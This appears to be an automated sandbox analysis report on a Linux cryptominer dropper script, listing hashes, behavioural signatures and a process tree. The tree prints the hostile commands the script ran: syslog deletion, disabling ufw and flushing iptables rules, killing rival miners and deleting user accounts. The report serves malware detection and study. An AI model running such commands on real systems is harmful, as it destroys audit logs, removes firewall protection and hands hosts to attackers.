Resubmissions

09-09-2024 17:01

240909-vjrada1gmd 10

24-01-2024 21:55

240124-1srkdsaadr 10

Analysis

  • max time kernel
    149s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
  • submitted
    09-09-2024 17:01

General

  • Target

    a.sh

  • Size

    6KB

  • MD5

    e97dee2d99e3bd5150abdfb488aafeb8

  • SHA1

    8a9b089a194b383b2202457afa1e0b3ec8fc4d3f

  • SHA256

    f5462666cfd610336545233aba5f6014699d4b07829c856d0b99956075f7331b

  • SHA512

    1d572bc3c7642ea007d441865c879ce4037848210a5194ea1bf262af22e9b84e674c067138531672758e2fbf7a53e82820502736827366d4688180c1f6bcfa25

  • SSDEEP

    192:mRoo5wsIGV7DDf6jlpTWg3vMGQit/3PCd/8PY3+R3YB:mao5wgV7DDf6jlpTWg3vMGQit/3PCd//

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes system logs 1 TTPs 1 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Flushes firewall rules 3 IoCs

    Flushes/disables firewall rules inside the Linux kernel.

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence.

  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

  • Disables AppArmor 28 IoCs

    Disables AppArmor security module.

  • Disables SELinux 1 IoCs

    Disables SELinux security module.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name 1 IoCs
  • Reads CPU attributes 1 TTPs 14 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a.sh
    /tmp/a.sh
    1⤵
    • Writes file to tmp directory
    PID:1510
    • /bin/grep
      grep -v grep
      2⤵
        PID:1516
      • /bin/grep
        grep .docker
        2⤵
          PID:1515
        • /bin/ps
          ps aux
          2⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1514
        • /usr/bin/sudo
          sudo -n true
          2⤵
          • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
          PID:1517
        • /bin/rm
          rm -rf /tmp/a.sh /tmp/config-err-9v8ijU /tmp/netplan_6o2m7k83 /tmp/snap-private-tmp /tmp/ssh-X651Ud74vhtf /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra /tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-MRYxba
          2⤵
            PID:1519
          • /bin/rm
            rm -rf /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-nNGoa6 /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-fmSYoe /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-3TrBTk /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-b8W9ey /var/tmp/systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PIeStI
            2⤵
              PID:1520
            • /bin/rm
              rm -rf /tmp/. /tmp/.. /tmp/.font-unix /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix
              2⤵
                PID:1521
              • /bin/rm
                rm -rf /var/tmp/. /var/tmp/..
                2⤵
                  PID:1522
                • /bin/rm
                  rm -rf /root/.docker.json
                  2⤵
                    PID:1523
                  • /bin/rm
                    rm -rf /root/.xmrig.json
                    2⤵
                      PID:1524
                    • /bin/rm
                      rm -rf /root/.config/docker.json
                      2⤵
                        PID:1525
                      • /bin/rm
                        rm -rf /root/.config/xmrig.json
                        2⤵
                          PID:1526
                        • /usr/bin/pgrep
                          pgrep kdevtmp
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1528
                        • /usr/bin/pgrep
                          pgrep kthreaddk
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1529
                        • /usr/bin/pgrep
                          pgrep kinsing
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1530
                        • /usr/bin/pgrep
                          pgrep solrd
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1531
                        • /usr/bin/pgrep
                          pgrep sidekiq
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1532
                        • /usr/bin/pkill
                          pkill -f kthreaddi
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1536
                        • /usr/bin/pkill
                          pkill -f kdevtmpfsi
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1537
                        • /usr/bin/pkill
                          pkill -f xmrig
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1538
                        • /usr/bin/pkill
                          pkill -f kinsing
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1539
                        • /usr/bin/pkill
                          pkill -f systemdd-dev
                          2⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1540
                        • /usr/bin/killall
                          killall -9 .dockerd
                          2⤵
                          • Reads runtime system information
                          PID:1541
                        • /usr/bin/killall
                          killall -9 .docker
                          2⤵
                          • Reads runtime system information
                          PID:1542
                        • /usr/bin/killall
                          killall -9 xmrig
                          2⤵
                          • Reads runtime system information
                          PID:1543
                        • /usr/bin/killall
                          killall -9 kthreaddi
                          2⤵
                          • Reads runtime system information
                          PID:1544
                        • /usr/bin/killall
                          killall -9 kdevtmpfsi
                          2⤵
                            PID:1545
                          • /usr/bin/killall
                            killall -9 kinsing
                            2⤵
                            • Reads runtime system information
                            PID:1546
                          • /usr/bin/killall
                            killall -9 ssrr
                            2⤵
                            • Reads runtime system information
                            PID:1547
                          • /usr/bin/killall
                            killall -9 .dockerd
                            2⤵
                            • Reads runtime system information
                            PID:1548
                          • /usr/bin/killall
                            killall -9 .docker
                            2⤵
                              PID:1549
                            • /usr/bin/killall
                              killall /bin/bash /var/tmp/.dockerd
                              2⤵
                                PID:1550
                              • /usr/bin/killall
                                killall /bin/bash /.docker
                                2⤵
                                  PID:1551
                                • /bin/rm
                                  rm -rf /var/log/syslog
                                  2⤵
                                  • Deletes system logs
                                  PID:1552
                                • /usr/sbin/ufw
                                  ufw disable
                                  2⤵
                                  • Flushes firewall rules
                                  PID:1553
                                  • /sbin/iptables
                                    /sbin/iptables -V
                                    3⤵
                                      PID:1554
                                    • /lib/ufw/ufw-init
                                      /lib/ufw/ufw-init force-stop
                                      3⤵
                                        PID:1555
                                        • /sbin/ip6tables
                                          ip6tables -L INPUT -n
                                          4⤵
                                            PID:1556
                                            • /sbin/modprobe
                                              /sbin/modprobe ip6_tables
                                              5⤵
                                              • Loads a kernel module
                                              • Enumerates kernel/hardware configuration
                                              PID:1557
                                          • /sbin/iptables
                                            iptables -F ufw-logging-deny
                                            4⤵
                                              PID:1561
                                            • /sbin/iptables
                                              iptables -F ufw-logging-allow
                                              4⤵
                                                PID:1564
                                              • /sbin/iptables
                                                iptables -F ufw-not-local
                                                4⤵
                                                  PID:1565
                                                • /sbin/iptables
                                                  iptables -F ufw-user-logging-input
                                                  4⤵
                                                    PID:1566
                                                  • /sbin/iptables
                                                    iptables -F ufw-user-limit-accept
                                                    4⤵
                                                      PID:1567
                                                    • /sbin/iptables
                                                      iptables -F ufw-user-limit
                                                      4⤵
                                                        PID:1568
                                                      • /sbin/iptables
                                                        iptables -F ufw-skip-to-policy-input
                                                        4⤵
                                                          PID:1569
                                                        • /sbin/iptables
                                                          iptables -F ufw-reject-input
                                                          4⤵
                                                            PID:1570
                                                          • /sbin/iptables
                                                            iptables -F ufw-after-logging-input
                                                            4⤵
                                                              PID:1571
                                                            • /sbin/iptables
                                                              iptables -F ufw-after-input
                                                              4⤵
                                                                PID:1572
                                                              • /sbin/iptables
                                                                iptables -F ufw-user-input
                                                                4⤵
                                                                  PID:1573
                                                                • /sbin/iptables
                                                                  iptables -F ufw-before-input
                                                                  4⤵
                                                                    PID:1574
                                                                  • /sbin/iptables
                                                                    iptables -F ufw-before-logging-input
                                                                    4⤵
                                                                      PID:1575
                                                                    • /sbin/iptables
                                                                      iptables -F ufw-skip-to-policy-forward
                                                                      4⤵
                                                                        PID:1576
                                                                      • /sbin/iptables
                                                                        iptables -F ufw-reject-forward
                                                                        4⤵
                                                                          PID:1577
                                                                        • /sbin/iptables
                                                                          iptables -F ufw-after-logging-forward
                                                                          4⤵
                                                                            PID:1578
                                                                          • /sbin/iptables
                                                                            iptables -F ufw-after-forward
                                                                            4⤵
                                                                              PID:1579
                                                                            • /sbin/iptables
                                                                              iptables -F ufw-user-logging-forward
                                                                              4⤵
                                                                                PID:1580
                                                                              • /sbin/iptables
                                                                                iptables -F ufw-user-forward
                                                                                4⤵
                                                                                  PID:1581
                                                                                • /sbin/iptables
                                                                                  iptables -F ufw-before-forward
                                                                                  4⤵
                                                                                    PID:1582
                                                                                  • /sbin/iptables
                                                                                    iptables -F ufw-before-logging-forward
                                                                                    4⤵
                                                                                      PID:1583
                                                                                    • /sbin/iptables
                                                                                      iptables -F ufw-track-forward
                                                                                      4⤵
                                                                                        PID:1584
                                                                                      • /sbin/iptables
                                                                                        iptables -F ufw-track-output
                                                                                        4⤵
                                                                                          PID:1585
                                                                                        • /sbin/iptables
                                                                                          iptables -F ufw-track-input
                                                                                          4⤵
                                                                                            PID:1586
                                                                                          • /sbin/iptables
                                                                                            iptables -F ufw-skip-to-policy-output
                                                                                            4⤵
                                                                                              PID:1587
                                                                                            • /sbin/iptables
                                                                                              iptables -F ufw-reject-output
                                                                                              4⤵
                                                                                                PID:1588
                                                                                              • /sbin/iptables
                                                                                                iptables -F ufw-after-logging-output
                                                                                                4⤵
                                                                                                  PID:1589
                                                                                                • /sbin/iptables
                                                                                                  iptables -F ufw-after-output
                                                                                                  4⤵
                                                                                                    PID:1590
                                                                                                  • /sbin/iptables
                                                                                                    iptables -F ufw-user-logging-output
                                                                                                    4⤵
                                                                                                      PID:1591
                                                                                                    • /sbin/iptables
                                                                                                      iptables -F ufw-user-output
                                                                                                      4⤵
                                                                                                        PID:1592
                                                                                                      • /sbin/iptables
                                                                                                        iptables -F ufw-before-output
                                                                                                        4⤵
                                                                                                          PID:1593
                                                                                                        • /sbin/iptables
                                                                                                          iptables -F ufw-before-logging-output
                                                                                                          4⤵
                                                                                                            PID:1594
                                                                                                          • /sbin/iptables
                                                                                                            iptables -Z ufw-logging-deny
                                                                                                            4⤵
                                                                                                              PID:1595
                                                                                                            • /sbin/iptables
                                                                                                              iptables -Z ufw-logging-allow
                                                                                                              4⤵
                                                                                                                PID:1596
                                                                                                              • /sbin/iptables
                                                                                                                iptables -Z ufw-not-local
                                                                                                                4⤵
                                                                                                                  PID:1597
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -Z ufw-user-logging-input
                                                                                                                  4⤵
                                                                                                                    PID:1598
                                                                                                                  • /sbin/iptables
                                                                                                                    iptables -Z ufw-user-limit-accept
                                                                                                                    4⤵
                                                                                                                      PID:1599
                                                                                                                    • /sbin/iptables
                                                                                                                      iptables -Z ufw-user-limit
                                                                                                                      4⤵
                                                                                                                        PID:1600
                                                                                                                      • /sbin/iptables
                                                                                                                        iptables -Z ufw-skip-to-policy-input
                                                                                                                        4⤵
                                                                                                                          PID:1601
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -Z ufw-reject-input
                                                                                                                          4⤵
                                                                                                                            PID:1602
                                                                                                                          • /sbin/iptables
                                                                                                                            iptables -Z ufw-after-logging-input
                                                                                                                            4⤵
                                                                                                                              PID:1603
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -Z ufw-after-input
                                                                                                                              4⤵
                                                                                                                                PID:1604
                                                                                                                              • /sbin/iptables
                                                                                                                                iptables -Z ufw-user-input
                                                                                                                                4⤵
                                                                                                                                  PID:1605
                                                                                                                                • /sbin/iptables
                                                                                                                                  iptables -Z ufw-before-input
                                                                                                                                  4⤵
                                                                                                                                    PID:1606
                                                                                                                                  • /sbin/iptables
                                                                                                                                    iptables -Z ufw-before-logging-input
                                                                                                                                    4⤵
                                                                                                                                      PID:1607
                                                                                                                                    • /sbin/iptables
                                                                                                                                      iptables -Z ufw-skip-to-policy-forward
                                                                                                                                      4⤵
    PID:1608
• /sbin/iptables
  iptables -Z ufw-reject-forward
  4⤵
    PID:1609
• /sbin/iptables
  iptables -Z ufw-after-logging-forward
  4⤵
    PID:1610
• /sbin/iptables
  iptables -Z ufw-after-forward
  4⤵
    PID:1611
• /sbin/iptables
  iptables -Z ufw-user-logging-forward
  4⤵
    PID:1612
• /sbin/iptables
  iptables -Z ufw-user-forward
  4⤵
    PID:1613
• /sbin/iptables
  iptables -Z ufw-before-forward
  4⤵
    PID:1614
• /sbin/iptables
  iptables -Z ufw-before-logging-forward
  4⤵
    PID:1615
• /sbin/iptables
  iptables -Z ufw-track-forward
  4⤵
    PID:1616
• /sbin/iptables
  iptables -Z ufw-track-output
  4⤵
    PID:1617
• /sbin/iptables
  iptables -Z ufw-track-input
  4⤵
    PID:1618
• /sbin/iptables
  iptables -Z ufw-skip-to-policy-output
  4⤵
    PID:1619
• /sbin/iptables
  iptables -Z ufw-reject-output
  4⤵
    PID:1620
• /sbin/iptables
  iptables -Z ufw-after-logging-output
  4⤵
    PID:1621
• /sbin/iptables
  iptables -Z ufw-after-output
  4⤵
    PID:1622
• /sbin/iptables
  iptables -Z ufw-user-logging-output
  4⤵
    PID:1623
• /sbin/iptables
  iptables -Z ufw-user-output
  4⤵
    PID:1624
• /sbin/iptables
  iptables -Z ufw-before-output
  4⤵
    PID:1625
• /sbin/iptables
  iptables -Z ufw-before-logging-output
  4⤵
    PID:1626
• /sbin/iptables
  iptables -X ufw-logging-deny
  4⤵
    PID:1627
• /sbin/iptables
  iptables -X ufw-logging-allow
  4⤵
    PID:1628
• /sbin/iptables
  iptables -X ufw-not-local
  4⤵
    PID:1629
• /sbin/iptables
  iptables -X ufw-user-logging-input
  4⤵
    PID:1630
• /sbin/iptables
  iptables -X ufw-user-logging-output
  4⤵
    PID:1631
• /sbin/iptables
  iptables -X ufw-user-logging-forward
  4⤵
    PID:1632
• /sbin/iptables
  iptables -X ufw-user-limit-accept
  4⤵
    PID:1633
• /sbin/iptables
  iptables -X ufw-user-limit
  4⤵
    PID:1634
• /sbin/iptables
  iptables -X ufw-user-input
  4⤵
    PID:1635
• /sbin/iptables
  iptables -X ufw-user-forward
  4⤵
    PID:1636
• /sbin/iptables
  iptables -X ufw-user-output
  4⤵
    PID:1637
• /sbin/iptables
  iptables -X ufw-skip-to-policy-input
  4⤵
    PID:1638
• /sbin/iptables
  iptables -X ufw-skip-to-policy-output
  4⤵
    PID:1639
• /sbin/iptables
  iptables -X ufw-skip-to-policy-forward
  4⤵
    PID:1640
• /sbin/iptables
  iptables -P INPUT ACCEPT
  4⤵
    PID:1641
• /sbin/iptables
  iptables -P OUTPUT ACCEPT
  4⤵
    PID:1642
• /sbin/iptables
  iptables -P FORWARD ACCEPT
  4⤵
    PID:1643
• /sbin/ip6tables
  ip6tables -F ufw6-logging-deny
  4⤵
    PID:1644
• /sbin/ip6tables
  ip6tables -F ufw6-logging-allow
  4⤵
    PID:1645
• /sbin/ip6tables
  ip6tables -F ufw6-not-local
  4⤵
    PID:1646
• /sbin/ip6tables
  ip6tables -F ufw6-user-logging-input
  4⤵
    PID:1647
• /sbin/ip6tables
  ip6tables -F ufw6-user-limit-accept
  4⤵
    PID:1648
• /sbin/ip6tables
  ip6tables -F ufw6-user-limit
  4⤵
    PID:1649
• /sbin/ip6tables
  ip6tables -F ufw6-skip-to-policy-input
  4⤵
    PID:1650
• /sbin/ip6tables
  ip6tables -F ufw6-reject-input
  4⤵
    PID:1651
• /sbin/ip6tables
  ip6tables -F ufw6-after-logging-input
  4⤵
    PID:1652
• /sbin/ip6tables
  ip6tables -F ufw6-after-input
  4⤵
    PID:1653
• /sbin/ip6tables
  ip6tables -F ufw6-user-input
  4⤵
    PID:1654
• /sbin/ip6tables
                                                                                                                                                                                                                                    ip6tables -F ufw6-before-input
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1655
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -F ufw6-before-logging-input
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1656
                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                        ip6tables -F ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1657
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -F ufw6-reject-forward
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1658
                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                            ip6tables -F ufw6-after-logging-forward
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1659
                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                              ip6tables -F ufw6-after-forward
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1660
                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                ip6tables -F ufw6-user-logging-forward
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1661
                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                  ip6tables -F ufw6-user-forward
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1662
                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                    ip6tables -F ufw6-before-forward
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1663
                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                      ip6tables -F ufw6-before-logging-forward
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:1664
                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                        ip6tables -F ufw6-track-forward
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1665
                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                          ip6tables -F ufw6-track-output
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1666
                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                            ip6tables -F ufw6-track-input
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:1667
                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                              ip6tables -F ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                ip6tables -F ufw6-reject-output
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:1669
                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                  ip6tables -F ufw6-after-logging-output
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1670
                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                    ip6tables -F ufw6-after-output
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1671
                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                      ip6tables -F ufw6-user-logging-output
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                        ip6tables -F ufw6-user-output
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1673
                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                          ip6tables -F ufw6-before-output
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1674
                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                            ip6tables -F ufw6-before-logging-output
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:1675
                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                              ip6tables -Z ufw6-logging-deny
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1676
                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                ip6tables -Z ufw6-logging-allow
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1677
                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                  ip6tables -Z ufw6-not-local
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1678
                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                    ip6tables -Z ufw6-user-logging-input
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1679
                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                      ip6tables -Z ufw6-user-limit-accept
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1680
                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
    ip6tables -Z ufw6-user-limit
    4⤵
      PID:1681
  • /sbin/ip6tables
    ip6tables -Z ufw6-skip-to-policy-input
    4⤵
      PID:1682
  • /sbin/ip6tables
    ip6tables -Z ufw6-reject-input
    4⤵
      PID:1683
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-logging-input
    4⤵
      PID:1684
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-input
    4⤵
      PID:1685
  • /sbin/ip6tables
    ip6tables -Z ufw6-user-input
    4⤵
      PID:1686
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-input
    4⤵
      PID:1687
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-logging-input
    4⤵
      PID:1688
  • /sbin/ip6tables
    ip6tables -Z ufw6-skip-to-policy-forward
    4⤵
      PID:1689
  • /sbin/ip6tables
    ip6tables -Z ufw6-reject-forward
    4⤵
      PID:1690
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-logging-forward
    4⤵
      PID:1691
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-forward
    4⤵
      PID:1692
  • /sbin/ip6tables
    ip6tables -Z ufw6-user-logging-forward
    4⤵
      PID:1693
  • /sbin/ip6tables
    ip6tables -Z ufw6-user-forward
    4⤵
      PID:1694
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-forward
    4⤵
      PID:1695
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-logging-forward
    4⤵
      PID:1696
  • /sbin/ip6tables
    ip6tables -Z ufw6-track-forward
    4⤵
      PID:1697
  • /sbin/ip6tables
    ip6tables -Z ufw6-track-output
    4⤵
      PID:1698
  • /sbin/ip6tables
    ip6tables -Z ufw6-track-input
    4⤵
      PID:1699
  • /sbin/ip6tables
    ip6tables -Z ufw6-skip-to-policy-output
    4⤵
      PID:1700
  • /sbin/ip6tables
    ip6tables -Z ufw6-reject-output
    4⤵
      PID:1701
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-logging-output
    4⤵
      PID:1702
  • /sbin/ip6tables
    ip6tables -Z ufw6-after-output
    4⤵
      PID:1703
  • /sbin/ip6tables
    ip6tables -Z ufw6-user-logging-output
    4⤵
      PID:1704
  • /sbin/ip6tables
    ip6tables -Z ufw6-user-output
    4⤵
      PID:1705
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-output
    4⤵
      PID:1706
  • /sbin/ip6tables
    ip6tables -Z ufw6-before-logging-output
    4⤵
      PID:1707
  • /sbin/ip6tables
    ip6tables -X ufw6-logging-deny
    4⤵
      PID:1708
  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                ip6tables -X ufw6-logging-allow
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1709
                                                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                  ip6tables -X ufw6-not-local
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1710
                                                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                    ip6tables -X ufw6-user-logging-input
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:1711
                                                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                      ip6tables -X ufw6-user-logging-output
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                        ip6tables -X ufw6-user-logging-forward
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1713
                                                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                          ip6tables -X ufw6-user-limit-accept
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1714
                                                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                            ip6tables -X ufw6-user-limit
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1715
                                                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                              ip6tables -X ufw6-user-input
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1716
                                                                                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                ip6tables -X ufw6-user-forward
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1717
                                                                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                  ip6tables -X ufw6-user-output
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1718
                                                                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                    ip6tables -X ufw6-skip-to-policy-input
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1719
                                                                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                      ip6tables -X ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1720
                                                                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                        ip6tables -X ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1721
                                                                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                          ip6tables -P INPUT ACCEPT
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1722
                                                                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                            ip6tables -P OUTPUT ACCEPT
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1723
                                                                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                              ip6tables -P FORWARD ACCEPT
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1724
                                                                                                                                                                                                                                                                                                                                                                          • /sbin/iptables
                                                                                                                                                                                                                                                                                                                                                                            iptables -F
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                            • Flushes firewall rules
                                                                                                                                                                                                                                                                                                                                                                            PID:1725
                                                                                                                                                                                                                                                                                                                                                                          • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                                                                                                            userdel akay
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1726
                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                                                                                                              userdel vfinder
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1730
